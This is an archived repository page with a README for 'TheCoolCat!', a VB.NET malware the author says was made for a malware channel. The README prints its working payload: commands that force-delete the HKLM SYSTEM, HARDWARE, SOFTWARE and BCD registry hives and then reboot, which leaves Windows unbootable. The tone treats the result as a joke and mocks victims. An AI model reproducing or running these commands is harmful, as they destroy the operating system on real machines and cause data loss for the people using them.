No description
This repository has been archived on 2026-05-12. You can view files and clone it, but you cannot make any changes to its state, such as pushing and creating new issues, pull requests or comments.
  • Visual Basic .NET 100%
Find a file
2025-03-28 23:53:28 -03:00
.vs/TheCoolCat!/v14 first commit 2023-09-22 20:50:26 -03:00
AAAAAAAAAAAAA first commit 2023-09-22 20:50:26 -03:00
AAAAAAAAAAAAA.suo first commit 2023-09-22 20:50:26 -03:00
LICENSE.txt Update LICENSE.txt 2025-03-28 23:53:28 -03:00
README.md Update README.md 2023-09-23 09:41:21 -03:00
TheCoolCat!.sln first commit 2023-09-22 20:50:26 -03:00

Haruma

TheCoolCat!

TheCoolCat! is basically a malware that I made for my (old) malware channel.

image

What it does

It just deletes the windows registry and shows messageboxes until your computer crash or restart with the shutdown command

How it works

I made it in jan 2022 (wow it's ~2 years old) and I was very dumb with programming, so I made it in VB.Net for convenience and just executed some CMD commands for the payload

Shell("cmd.exe /c reg delete HKLM\SYSTEM /f")

Shell("cmd.exe /c reg delete HKLM\HARDWARE /f")

Shell("cmd.exe /c reg delete HKLM\SOFTWARE /f")

Shell("cmd.exe /c reg delete HKLM\BCD00000000 /f")

Shell("cmd.exe /c shutdown -r -t 20")

MessageBox.Show("", "", MessageBoxButtons.AbortRetryIgnore)

What happens after restarting

An infinite "Diagnosing your PC"

Error

Can I recover a PC after the payload?

If you have a backup of your registry, otherwize your best move is reinstall Windows. But if you ran it and want to close, you can always force close on the admin panel by clicking on the secret link and putting the user and password "admin":

image

image

Why it's TheCoolCat 3.5?

It has 3 versions: version 1.0 & 2.0 are shown on my video, but this is the third version, with nothing really new but an acceptable interface

HEY YOUR IDIOT MY PC DOESN'T BOOT ANYMORE DO SOMETHING

image

No?